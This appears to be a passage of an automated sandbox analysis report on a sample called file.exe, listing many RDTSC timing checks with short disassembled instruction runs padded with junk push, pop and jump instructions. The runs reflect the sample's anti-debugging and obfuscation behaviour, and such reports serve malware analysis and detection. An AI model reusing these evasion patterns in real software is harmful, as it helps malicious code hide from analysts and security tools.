              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8DBA second address: BF8DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB7D3 second address: BFB7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB7D7 second address: BFB7FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B48765F26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d js 00007F0B48765F46h 0x00000013 pushad 0x00000014 jmp 00007F0B48765F32h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBA88 second address: BFBABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0B48B8DEF4h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06086 second address: C0608A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0624A second address: C0625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB28ED second address: BB28F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB28F3 second address: BB2974 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B48B8DEE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add dword ptr [ebp+1247AA73h], edi 0x00000013 mov ebx, dword ptr [ebp+1248593Bh] 0x00000019 mov dx, di 0x0000001c add eax, ebx 0x0000001e push esi 0x0000001f mov edx, dword ptr [ebp+122D2DDCh] 0x00000025 pop edi 0x00000026 push eax 0x00000027 jng 00007F0B48B8DEFCh 0x0000002d push edi 0x0000002e jmp 00007F0B48B8DEF4h 0x00000033 pop edi 0x00000034 mov dword ptr [esp], eax 0x00000037 mov ecx, dword ptr [ebp+122D384Ah] 0x0000003d mov ecx, dword ptr [ebp+122D1B47h] 0x00000043 push 00000004h 0x00000045 call 00007F0B48B8DEF7h 0x0000004a mov ecx, edi 0x0000004c pop ecx 0x0000004d nop 0x0000004e jo 00007F0B48B8DEECh 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2974 second address: BB297B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB297B second address: BB2980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A1B4 second address: C0A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71849 second address: B7184F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09C88 second address: C09CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0B48765F26h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007F0B48765F36h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F0B48765F2Fh 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1066A second address: C10670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10670 second address: C10674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C10674 second address: C1068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F0B48B8DEE8h 0x0000000e js 00007F0B48B8DEECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11296 second address: C1129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C114F4 second address: C1151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48B8DEF1h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F0B48B8DEEDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1151C second address: C11535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007F0B48765F26h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11535 second address: C11539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11D5C second address: C11D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11D62 second address: C11D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11D66 second address: C11D83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E292 second address: B6E296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E35 second address: C16E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E3B second address: C16E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E3F second address: C16E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E43 second address: C16E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E49 second address: C16E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0B48765F33h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16E65 second address: C16E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17005 second address: C1700D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17151 second address: C17158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1728D second address: C17293 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17293 second address: C172B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F0B48B8DEF0h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C172B5 second address: C172D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F0B48765F34h 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17437 second address: C1743D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1743D second address: C17441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C17441 second address: C1746D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jbe 00007F0B48B8DEFAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F0B48B8DEF2h 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C175C9 second address: C175CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C175CD second address: C175E1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B48B8DEE6h 0x00000008 jl 00007F0B48B8DEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C175E1 second address: C175E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C175E5 second address: C175FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1F00F second address: C1F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0B48765F2Dh 0x0000000b jmp 00007F0B48765F30h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C24C49 second address: C24C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C24C4F second address: C24C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C254B0 second address: C254BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B48B8DEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C257A1 second address: C257B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F2Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C24705 second address: C24709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C398B6 second address: C398BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C398BB second address: C3990B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B48B8DF04h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0B48B8DEEBh 0x00000010 jnc 00007F0B48B8DEECh 0x00000016 jmp 00007F0B48B8DEECh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3990B second address: C3990F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39352 second address: C39360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jno 00007F0B48B8DEE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C413F3 second address: C413F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C497C9 second address: C497CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49631 second address: C4963B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0B48765F26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4963B second address: C4964A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5049D second address: C504B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0B48765F2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50325 second address: C50335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0B48B8DEE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59DB9 second address: C59DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0B48765F31h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59DD2 second address: C59DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B48B8DEF1h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C587EB second address: C5880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F0B48765F35h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58918 second address: C58925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0B48B8DEE6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59024 second address: C59045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A67 second address: C59A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F0B48B8DEF5h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A89 second address: C59A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59A8F second address: C59AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F0B48B8DEE6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59AA5 second address: C59ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F0B48765F26h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0B48765F34h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB36 second address: C5DB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F0B48B8DEE6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB45 second address: C5DB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F33h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D66D second address: C5D671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D671 second address: C5D675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D675 second address: C5D681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D681 second address: C5D685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D685 second address: C5D68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D68B second address: C5D691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D691 second address: C5D69B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B48B8DEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D69B second address: C5D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F0B48765F26h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D6B2 second address: C5D6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D6B7 second address: C5D6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D7FA second address: C5D805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B48B8DEE6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D805 second address: C5D82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0B48765F35h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D82A second address: C5D846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F0B48B8DEE6h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D846 second address: C5D84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D84A second address: C5D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A747 second address: C6A74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67815 second address: C67831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b jmp 00007F0B48B8DEEEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67831 second address: C6784A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F31h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7975A second address: C7975E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7975E second address: C79764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AD95 second address: C7ADAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0B48B8DEE6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ADAC second address: C7ADC2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0B48765F2Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D7DF second address: C7D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0B48B8DEE6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92ADE second address: C92AE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95D34 second address: C95D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EF2 second address: C95EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EF6 second address: C95F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F0B48B8DEF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95F8F second address: C95F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
